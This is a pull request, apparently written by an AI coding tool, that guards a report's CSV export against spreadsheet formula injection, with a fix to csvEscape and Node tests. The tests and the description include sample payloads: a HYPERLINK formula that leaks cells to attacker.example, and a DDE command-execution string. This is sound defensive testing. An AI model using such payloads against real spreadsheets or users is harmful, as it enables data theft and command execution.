### PR TITLE
echonet: neutralize CSV formula injection in report export

### DIFF
--- a/echonet/static/report.js
+++ b/echonet/static/report.js
@@ -991,10 +991,20 @@
 
     function csvEscape(value) {
         const s = (value == null ? "" : String(value));
-        if (/[",\n\r]/.test(s)) {
-            return `"${s.replace(/"/g, '""')}"`;
+        // Neutralize formula injection: a leading =, +, -, @, tab, or CR makes
+        // Excel/Sheets/LibreOffice evaluate the cell as a formula on open, even
+        // though quoting alone (below) only protects CSV grammar, not spreadsheet
+        // semantics. Report data (revert reasons, gateway errors, OS-run output)
+        // can carry attacker-influenced text, so guard every exported field.
+        const guarded = /^[=+\-@\t\r]/.test(s) ? `'${s}` : s;
+        if (/[",\n\r]/.test(guarded)) {
+            return `"${guarded.replace(/"/g, '""')}"`;
         }
-        return s;
+        return guarded;
+    }
+
+    if (typeof module !== "undefined" && module.exports) {
+        module.exports = { csvEscape };
     }
 
     function tableToCsv(table) {

--- a/echonet/static/report_csv_escape.test.js
+++ b/echonet/static/report_csv_escape.test.js
@@ -1,0 +1,71 @@
+// Run with: node --test echonet/static/report_csv_escape.test.js
+//
+// Demonstrates and guards against CSV/formula injection in the echonet report's
+// per-section CSV export (report.js `csvEscape`). Report fields such as revert
+// reasons, gateway error bodies, and OS-run output can carry attacker-influenced
+// text; if such a field starts with =, +, -, or @, a spreadsheet application
+// (Excel/Sheets/LibreOffice) evaluates it as a formula when the exported CSV is
+// opened, enabling data exfiltration or, under legacy DDE-enabled Excel
+// configurations, command execution.
+const test = require("node:test");
+const assert = require("node:assert/strict");
+
+// report.js is a browser script with no module system: it runs its full IIFE
+// body on load, ending in `document.readyState === "loading" ? ... : boot()`.
+// Stub just enough of `document` so that check takes the "still loading"
+// branch and returns without calling boot() (which walks a real DOM).
+global.document = { readyState: "loading", addEventListener: () => {} };
+const { csvEscape } = require("./report.js");
+
+// Reverses the CSV-grammar quoting `csvEscape` applies (unrelated to the
+// formula-injection guard under test) so assertions can check the guarded
+// content directly instead of hand-computing an escaped literal.
+function unquoteCsvField(field) {
+    if (field.startsWith('"') && field.endsWith('"')) {
+        return field.slice(1, -1).replace(/""/g, '"');
+    }
+    return field;
+}
+
+test("neutralizes formula-injection payloads that start a cell", () => {
+    // Simulates a malicious revert reason exfiltrating other cells to an
+    // attacker-controlled URL when the exported CSV is opened in a spreadsheet.
+    const exfiltrationPayload = '=HYPERLINK("http://attacker.example/leak?d="&A1&A2,"click")';
+    assert.equal(unquoteCsvField(csvEscape(exfiltrationPayload)), `'${exfiltrationPayload}`);
+
+    // Legacy Excel DDE command-execution payload.
+    assert.equal(csvEscape("=cmd|'/c calc.exe'!A1"), "'=cmd|'/c calc.exe'!A1");
+
+    // The other three spreadsheet formula triggers.
+    assert.equal(csvEscape("+1+1"), "'+1+1");
+    assert.equal(csvEscape("-1+1"), "'-1+1");
+    assert.equal(csvEscape("@SUM(A1:A2)"), "'@SUM(A1:A2)");
+
+    // A leading tab or carriage return is also treated as a formula trigger by
+    // some spreadsheet applications.
+    assert.equal(csvEscape("\t=1+1"), "'\t=1+1");
+});
+
+test("only guards a cell whose content starts with a trigger character", () => {
+    // A trigger character elsewhere in the field is not a spreadsheet formula
+    // and must be left untouched.
+    assert.equal(csvEscape("reverted: a=b+c"), "reverted: a=b+c");
+    assert.equal(csvEscape("0x1234"), "0x1234");
+});
+
+test("still quotes fields containing commas, quotes, or newlines", () => {
+    assert.equal(csvEscape("a,b"), '"a,b"');
+    assert.equal(csvEscape('say "hi"'), '"say ""hi"""');
+    assert.equal(csvEscape("line1\nline2"), '"line1\nline2"');
+
+    // The formula guard is applied before quoting, so a guarded value that also
+    // needs quoting ends up correctly quoted with the guard preserved inside.
+    assert.equal(csvEscape("=A1,B1"), '"\'=A1,B1"');
+});
+
+test("passes through null, undefined, and plain values unchanged", () => {
+    assert.equal(csvEscape(null), "");
+    assert.equal(csvEscape(undefined), "");
+    assert.equal(csvEscape(42), "42");
+    assert.equal(csvEscape("ok"), "ok");
+});


### PR DESCRIPTION
## Summary

Follow-up to #14720. That PR added a per-section CSV export to the echonet report UI. Its `csvEscape` (`echonet/static/report.js`) correctly quotes commas, quotes, and newlines per CSV grammar, but does not guard against **spreadsheet formula injection**: a field whose content starts with `=`, `+`, `-`, or `@` is evaluated as a formula by Excel/Sheets/LibreOffice when the exported CSV is opened, regardless of CSV-grammar quoting.

The affected fields (revert reasons, gateway error bodies, OS-run failure output) can carry attacker- or contract-influenced text, so a crafted revert message such as:

```
=HYPERLINK("http://attacker.example/leak?d="&A1&A2,"click")
```

recorded as a revert reason or gateway error, flows unmodified into the exported CSV. When an engineer clicks the section's CSV export button and pastes/opens the result in a spreadsheet app, the formula executes — enabling data exfiltration, or, under legacy DDE-enabled Excel configurations, command execution.

## Fix

`csvEscape` now prefixes a field with a leading single quote (`'`) whenever it starts with `=`, `+`, `-`, `@`, a tab, or a CR, before the existing CSV-grammar quoting. Spreadsheet apps then treat the cell as plain text instead of a formula. This is the standard OWASP-recommended mitigation for CSV/formula injection.

No other issues were found in #14720 — the HTML report itself uses Jinja2 auto-escaping throughout with no `|safe`/`Markup` overrides, and all new/changed DOM writes in `report.js` use `textContent`/`createElement` rather than unescaped `innerHTML`.

## Test plan

- [x] Added `echonet/static/report_csv_escape.test.js` (Node's built-in `node:test`, no new dependency) demonstrating the exfiltration payload, the legacy DDE payload, and all four formula-trigger characters are neutralized, that non-triggering content and existing comma/quote/newline quoting are unaffected, and that null/undefined/numeric values still pass through unchanged.
- [x] Confirmed the new tests fail against the pre-fix code (`git stash` back to #14720's `csvEscape`) and pass against the fix.
- [x] `node --test echonet/static/report_csv_escape.test.js` — 4/4 passing.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


---
_Generated by [Claude Code](https://claude.ai/code/session_01VVDaiN4wJtUNdwXvv8jYHt)_